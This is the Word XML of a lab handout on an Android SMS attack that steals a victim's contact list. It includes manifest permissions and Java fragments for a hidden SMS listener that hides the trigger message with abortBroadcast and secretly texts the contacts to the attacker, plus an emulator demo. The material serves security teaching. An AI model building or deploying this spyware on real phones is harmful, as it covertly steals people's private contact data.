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F13438" w:rsidP="000B19A1">
      <w:pPr>
        <w:pStyle w:val="papertitle"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="009303D9" w:rsidRPr="004729E7" w:rsidSect="004C50B8">
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
      <w:r w:rsidR="00032F14">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Steal Contact List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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4C50B8">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRPr="00F13438" w:rsidRDefault="009303D9" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00F13438" w:rsidRPr="00F13438">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>In this lab, we will use a malicious Android application we wrote to demonstrate a kind of SMS attack on Android platform. The malicious Android application which can grab a victim's contact list by sending the victim a secret short message and get the victim's contact list in a response short message secretly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRDefault="00222949" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00222949">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00F13438">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>We assume that the malicious application has been installed on a victim's Android phone carelessly. The application serves as an SMS broadcast listener which always listens to the short messages coming to the phone. As the SMS broadcast listener has a very high priority, which we set it in the AndroidManifest.xml, it will always receive the short message earlier than the Android phone SMS inbox. The application will check the SMS content to see whether it matches a hard coded pattern. If the pattern matches, it means a malicious short message request comes. Then, the application will abort the broadcast of the received short message to the inbox which means that the SMS inbox will not show the received malicious message that requests the victim's contact list. After that the application will grab the contact list and send the contact name and the phone number in one or more short messages to the attacker secretly. For ethical issue, we will not provide the entire code for this attack. We will only provide some crucial fragments instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13438" w:rsidRPr="00F13438" w:rsidRDefault="00F13438" w:rsidP="00F13438">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="062BC488" wp14:editId="656846A8">
            <wp:extent cx="3204845" cy="1564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845" cy="1564005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRDefault="00D21518" w:rsidP="00222949">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Lab Activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00E21099">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>use a "SmsBroadCastReceiver" to listen on all the received short messages.</w:t>
      </w:r>
      <w:r w:rsidR="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e have to request permission for reading the contact list, sending and receiving</w:t>
      </w:r>
      <w:r w:rsidR="00236E58">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, read</w:t>
      </w:r>
      <w:r w:rsidR="00236E58">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ing and writing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMS in AndroidManifest.xml as the following:</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android:name="android.permission.RECEIVE_SMS"</w:t>
            </w:r>
            <w:r w:rsidR="000B63E6" w:rsidRPr="000B63E6">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F13438" w:rsidRDefault="000B63E6" w:rsidP="00F13438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.SEND_SMS"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B63E6" w:rsidRPr="000B63E6"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android:name="android.permission.READ_SMS" /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B63E6" w:rsidRPr="00F13438"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android:name="android.permission.WRITE_SMS" /&gt;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android:name="android.permission.READ_CONTACTS"</w:t>
            </w:r>
            <w:r w:rsidR="000B63E6">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F13438" w:rsidRPr="00F26D6B" w:rsidRDefault="002F6EF5" w:rsidP="000B63E6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002F6EF5">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>READ_PHONE_STATE</w:t>
            </w:r>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="000B63E6">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00F13438">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Then we need to write code that can receive short message. The following code fragment shows how to receive SMS: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SmsMessage sms[] = new SmsMessage[object.length];</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for (int i = 0; i &lt; object.length; i++)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sms[i] = SmsMessage.createFromPdu((byte[]) object[i]);</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get the received SMS content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receivedPattern = sms[i].getDisplayMessageBody();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originNum = sms[i].getDisplayOriginatingAddress();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received SMS matches the SMS_PATTERN</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it means that this is a fetch contact list request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(receivedPattern.equalsIgnoreCase(SMS_PATTERN))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retrieve the all the contact records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contactList = retrieveContactRecord(cr);</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contact list is not empty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(!contactList.equalsIgnoreCase(""))</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send the response SMS with the retrieved contact info</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sendReplySMS(originNum, contactList);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prevent the notification of the received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abortBroadcast();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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F13438" w:rsidRPr="00F26D6B" w:rsidRDefault="00F13438" w:rsidP="00F13438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E4796">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>We also need to write the logic which sends the reply short message with the contact list. The following code fragment shows how we use code to send reply secret short message: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6E4796" w:rsidRPr="00F26D6B" w:rsidTr="000A6ABB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4796">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>//get a SmsManager</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SmsManager smsManager = SmsManager.getDefault(); </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//Message may exceed 160 characters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//need to divide the message into multiples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ArrayList&lt;String&gt; parts = smsManager.divideMessage(sms);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="00F26D6B" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4796">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> smsManager.sendMultipartTextMessage(phoneNo, null, parts, null, null);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003B63C6" w:rsidRDefault="003B63C6" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BroadcastReceiver tutorial:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B63C6" w:rsidRDefault="009336F3" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="003B63C6" w:rsidRPr="00224155">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:eastAsia="宋体"/>
            <w:szCs w:val="22"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://www.vogella.com/tutorials/AndroidBroadcastReceiver/article.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B63C6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B63C6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="003B63C6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Need to climb the wall</w:t>
      </w:r>
      <w:r w:rsidR="003B63C6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2926" w:rsidRDefault="008B0E41" w:rsidP="00CC2926">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Demo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00086947" w:rsidRDefault="00B229B3" w:rsidP="00B229B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Open two emulators on your eclipse. Emulator</w:t>
      </w:r>
      <w:r w:rsidR="00032F14">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C65AF2">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with ID 5554)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> serves as a victim which has installed and run the malicious application above. Emulator 2</w:t>
      </w:r>
      <w:r w:rsidR="00C65AF2">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with ID 5556)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> serves as a malicious attacker which tries to grab Emulator1's contact list.</w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dd some contacts on Emulator1</w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00086947" w:rsidRPr="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>On Emulator2, send a short message to Emulator1 with the content "SEND ME YOUR CONTACTS:)" as we hard coded in the application</w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00086947" w:rsidRPr="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, it automatically </w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Emulator 2 will </w:t>
      </w:r>
      <w:r w:rsidR="00086947" w:rsidRPr="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">receive a response short message from Emulator 1 </w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>with its contact list.</w:t>
      </w:r>
      <w:r w:rsidR="00A45E4A">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00414BFC">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidR="00414BFC" w:rsidRPr="00414BFC">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SMSSecurity_Threat-Attack_LabDemo.mp4</w:t>
      </w:r>
      <w:r w:rsidR="00414BFC">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the demo process. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00086947" w:rsidRDefault="00086947" w:rsidP="00B229B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B229B3" w:rsidRDefault="00086947" w:rsidP="00B229B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Please include step-by-step screenshots in the lab report, with your name in English as one of the contacts on Emulator 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C44E6" w:rsidRPr="000C44E6" w:rsidRDefault="000C44E6" w:rsidP="000C44E6">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C44E6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Correction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
